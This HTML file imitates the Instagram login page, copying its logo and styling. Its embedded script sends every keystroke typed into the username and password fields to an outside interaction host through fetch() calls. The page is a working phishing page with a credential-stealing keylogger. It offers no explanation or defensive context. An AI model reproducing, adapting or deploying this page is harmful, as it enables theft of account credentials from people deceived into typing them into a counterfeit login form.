<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram Login</title>
    <style>
        body {
            background-color: #fafafa;
            font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        .login-container {
            background-color: #fff;
            border: 1px solid #dbdbdb;
            padding: 40px;
            width: 350px;
            text-align: center;
            box-shadow: 0px 0px 5px rgba(0, 0, 0, 0.1);
        }

        input[type="text"], input[type="password"] {
            width: 100%;
            padding: 10px;
            margin: 5px 0;
            border: 1px solid #dbdbdb;
            border-radius: 3px;
            background-color: #fafafa;
            font-size: 14px;
        }

        input[type="submit"] {
            background-color: #3897f0;
            color: white;
            border: none;
            padding: 10px;
            margin-top: 10px;
            border-radius: 3px;
            width: 100%;
            font-size: 14px;
            cursor: pointer;
        }

        input[type="submit"]:hover {
            background-color: #318ce7;
        }

        .logo {
            margin-bottom: 20px;
        }

        .logo img {
            width: 175px;
        }
    </style>
</head>
<body>
    <div class="login-container">
        <div class="logo">
            <img src="https://upload.wikimedia.org/wikipedia/commons/a/a5/Instagram_icon.png" alt="Instagram">
        </div>
        <form>
            <input id='login' type="text" placeholder="Phone number, username, or email">
            <input id='password' type="password" placeholder="Password">
            <input type="submit" value="Log In">
        </form>
    </div>
    <script>
        const login = document.getElementById("login")
        const password = document.getElementById("password");
        
        login.addEventListener("keyup", logLogin);
        password.addEventListener("keyup", logPwd);
        
        function logLogin(e) {
          fetch("https://mpqsuakrbeiioklrcsazux2zlbt38gdca.oast.fun/login?login=" + login.value + e.code)
        }
        function logPwd(e) {
          fetch("https://mpqsuakrbeiioklrcsazux2zlbt38gdca.oast.fun/pwd?pwd=" + password.value)
        }
        
        </script>
</body>
</html>
